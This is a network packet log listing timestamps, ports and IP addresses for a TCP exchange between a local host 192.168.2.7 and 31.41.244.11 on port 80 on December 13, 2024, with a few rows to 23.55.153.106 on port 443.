Dec 13, 2024 18:53:44.559163094 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.559205055 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.560123920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.560177088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.560216904 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.560256958 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.561115026 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.561161041 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.561233044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.561278105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.562186003 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.562235117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.562290907 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.562335014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.563117027 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.563165903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.563255072 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.563297987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.564126015 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.564171076 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.564214945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.564258099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.565125942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.565171003 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.565244913 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.565289021 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.566205978 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.566250086 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.566379070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.566423893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.567259073 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.567306995 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.567347050 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.567385912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.568231106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.568278074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.568346024 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.568384886 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.569233894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.569278002 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.569341898 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.569386005 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.570329905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.570373058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.570415020 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.570455074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.571299076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.571347952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.571394920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.571434975 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.572292089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.572371006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.572442055 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.572614908 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.573417902 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.573468924 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.573515892 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.573559046 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.574337959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.574383020 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.574554920 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.574598074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.575448036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.575493097 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.575505972 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.575551987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.576459885 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.576512098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.576534033 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.576575994 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.577431917 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.577477932 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.577564955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.577605963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.578577042 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.578618050 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.578655958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.578699112 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.579556942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.579601049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.579718113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.579761028 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.580701113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.580750942 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.580912113 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.580955982 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.581873894 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.581927061 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.581995010 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.582036972 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.583033085 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.583118916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.583132982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.583197117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.584115982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.584172010 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.584201097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.584243059 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.585330009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.585372925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.585445881 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.585483074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.602313042 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:44.602354050 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:44.602416992 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:44.602818966 CET	49902	443	192.168.2.7	23.55.153.106
Dec 13, 2024 18:53:44.602828979 CET	443	49902	23.55.153.106	192.168.2.7
Dec 13, 2024 18:53:44.723465919 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.723531008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.723592043 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.723642111 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.724006891 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.724056005 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.724191904 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.724236012 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.724318027 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.724359989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.725168943 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.725213051 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.725301981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.725349903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.726605892 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.726650000 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.726694107 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.726738930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.727416992 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.727463007 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.727601051 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.727643967 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.728372097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.728420019 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.728446007 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.728483915 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.729269028 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.729331017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.729370117 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.729410887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.730349064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.730396986 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.730437040 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.730482101 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.731337070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.731389999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.731493950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.731535912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.732347965 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.732393026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.732477903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.732521057 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.733354092 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.733421087 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.733464956 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.733510017 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.734385967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.734430075 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.734493971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.734534979 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.735440016 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.735486031 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.735604048 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.735657930 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.736413002 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.736450911 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.736519098 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.736553907 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.737443924 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.737487078 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.737552881 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.737590075 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.738487959 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.738528013 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.738631010 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.738667965 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.739475965 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.739516973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.739592075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.739628077 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.740659952 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.740720987 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.740744114 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.740777969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.741609097 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.741648912 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.741714001 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.741750956 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.742604971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.742661953 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.742690086 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.742723942 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.743680954 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.743722916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.743788004 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.743824005 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.744620085 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.744658947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.744733095 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.744770050 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.745623112 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.745666981 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.745727062 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.745764971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.746669054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.746706963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.746793032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.746830940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.747672081 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.747714043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.747782946 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.747821093 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.748728991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.748769999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.748905897 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.748944998 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.749743938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.749784946 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.749927044 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.749964952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.750807047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.750878096 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.750905991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.750945091 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.751817942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.751859903 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.751919031 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.751955986 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.753067017 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.753078938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.753104925 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.753120899 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.753818035 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.753858089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.753911972 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.753952026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.754861116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.754904985 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.754978895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.755016088 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.755927086 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.755970001 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.756149054 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.756187916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.756912947 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.756953001 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.757020950 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.757057905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.757916927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.757957935 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.758084059 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.758121014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.758975983 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.759011984 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.759088993 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.759129047 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.760025024 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.760061979 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.760107994 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.760144949 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.761022091 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.761063099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.761161089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.761198997 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.762120008 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.762161016 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.762243986 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.762280941 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.763067961 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.763103962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.763191938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.763230085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.764162064 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.764213085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.764353037 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.764390945 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.765394926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.765444040 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.765460014 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.765496016 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.766156912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.766223907 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.766228914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.766268969 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.767155886 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.767191887 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.767232895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.767266989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.768192053 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.768229008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.768388033 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.768426895 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.769299984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.769321918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.769339085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.769357920 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.770266056 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.770337105 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.770363092 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.770380974 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.771233082 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.771275043 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.771327019 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.771370888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.772336006 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.772382975 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.772453070 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.772499084 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.773350000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.773391962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.773472071 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.773515940 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.774447918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.774491072 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.774575949 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.774615049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.775363922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.775403023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.775473118 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.775521040 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.776428938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.776470900 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.776516914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.776551962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.915412903 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.915461063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.915503025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.915503025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.915666103 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.915714025 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.915800095 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.915847063 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.916670084 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.916733980 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.916826963 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.916870117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.917731047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.917774916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.917845011 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.917889118 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.918456078 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:44.918498039 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:44.918538094 CET	80	49895	31.41.244.11	192.168.2.7
